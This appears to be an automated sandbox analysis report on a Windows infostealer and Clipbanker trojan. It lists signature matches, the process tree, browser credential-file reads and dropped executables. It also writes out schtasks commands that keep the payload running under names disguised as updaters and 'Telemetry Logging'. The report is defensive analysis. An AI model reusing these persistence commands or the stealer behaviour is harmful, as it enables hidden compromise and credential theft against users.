Source: C:\Users\user\Desktop\file.exe Code function: String function: 000000C000433780 appears 32 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 02E34380 appears 59 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 02F47510 appears 114 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 02E1ACE0 appears 146 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 02E02CF0 appears 113 times
PE file contains more sections than normal
Source: file.exe Static PE information: Number of sections : 12 > 10
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
Source: file.exe, 00000000.00000003.2256735049.000001916163A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
Source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
Source: file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
Source: file.exe, 00000000.00000002.2266583245.000000C001800000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
Source: file.exe, 00000000.00000000.2068913511.00007FF6DE1C6000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
Source: file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
Source: file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
Source: file.exe Binary or memory string: OriginalFileName vs file.exe
Yara signature match
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000000.00000002.2264717201.000000C000BAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000A.00000002.2424820883.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000A.00000002.2424820883.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.2598207071.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.2598207071.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.2437046066.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.2437046066.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000000.00000002.2265171878.000000C000CAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.2265171878.000000C000FD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000014.00000002.2518294350.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.2518294350.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000009.00000002.2430942841.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000009.00000002.2430942841.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2677916205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000017.00000002.2677916205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000F.00000002.4555133321.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000F.00000002.4555133321.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@26/30@2/4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F447E0 GetLastError,GetVersionExA,FormatMessageW,LocalFree,FormatMessageA, 3_2_02F447E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F44DE0 GetVersionExA,CreateFileW,CreateFileA,GetDiskFreeSpaceW,GetDiskFreeSpaceA, 3_2_02F44DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E845E0 CreateDirectoryA,CreateDirectoryA,CoInitialize,CoCreateInstance,CoUninitialize,PathFindExtensionA,CopyFileA,Concurrency::cancel_current_task, 3_2_02E845E0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Libraries\flhkh.scif Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_03
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Temp\trixyCPXDj512V5iG Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\system32\be48b7e085f82db6cf0b1ec635202c1c4f4f538484da64a27afabc6ff559817fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2256735049.00000191614B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2256735049.00000191614B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: vNnwTwjWIvfBLogin Data.3.dr, KqbMb6uMMrllLogin Data For Account.3.dr, AUbJyYTe1V8SLogin Data.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BitLockerToGo.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: file.exe String found in binary or memory: net/addrselect.go
Source: file.exe String found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe "C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
